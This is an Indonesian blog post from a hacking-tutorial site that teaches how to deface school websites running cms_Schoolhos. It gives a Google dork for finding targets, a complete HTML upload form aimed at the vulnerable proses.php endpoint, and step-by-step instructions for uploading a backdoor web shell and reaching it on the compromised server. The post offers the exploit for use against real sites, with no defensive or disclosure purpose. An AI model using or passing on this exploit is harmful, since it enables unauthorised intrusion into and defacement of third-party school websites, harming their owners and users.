CSRF cms_Schoolhos - Alltutorcyber

Alltutorcyber

Kumpulan Berbagai TUTORIAL yang ada di Internet.

Breaking

Post Top Ad

All Tutor Cyber

Wednesday, July 18, 2018

CSRF cms_Schoolhos


CSRF cms_Schoolhos

Oke baiklah bersama kami All Tutor Cyber. Kali ini saya sebagai admin akan membahas tutorial Deface Mengenai CSRF cms_Schoolhos.

Langsung saja kita mulai Tutorialnya

Upss.., sebelum itu kita siapkan alat tempurnya, apa saja alat tempurnya ?!
- Shell Backdoor ( Saya rasa udah punya sendiri sendiri )
- Script Deface ( Saya rasa udah punya sendiri sendiri )
- Dork :
             inurl:/?p=berita ( Kembangkan dorknya )
-CSRF :
  <html>
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <title>Tatsumi Crew</title>
  </head>
  <body>
  <form method="POST" action="site.com/elearningku/proses.php?pilih=guru&untukdi=upload" enctype="multipart/form-data" name="tambahmapel" id="tambahmapel">
  <input type="file" name="fupload">
  <input type="submit" class="tombol" value="Upload">
  </form>
  </body>
  </html>
Note: Yang warna merah ganti menjadi site target kalian.

Langusung saja :

1. Dorking dulu di google ( Berdoa saja semoga dapat yang vuln )

2. Jika sudah masukkan exploitnya seperti ini
contoh
site.com/[PATCH]/elearningku/proses.php
Jika ada blank atau putih berarti vuln selanjutnya


3. Masukkan link beserta exploit tadi ke dalam CSRF


4. Dan save CSRF dengan format .html
    contoh : CSRF.html

5. Buka CSRF tersebut menggunakan browser kalian

6. Upload shell kalian


7. Akses shell ?!
    site.com/file/materi/namashell.php


Sekianlah Postingan Dari All Tutor Cyber tentang "CSRF cms_Schoolhos" Semoga Bisa Bermanfaat!

Anda Sekarang Sedang Membaca Postingan "CSRF cms_Schoolhos" Dengan URL https://www.alltutorcyber.me/2018/07/csrf-cmsschoolhos.html
Jika Ada Content Yang Rusak, Atau Kurang dapat dipahami silahkan komentar di bawah Postingan atau anda juga bisa menghubungi kami pada bagian Contact Us.


1 comment: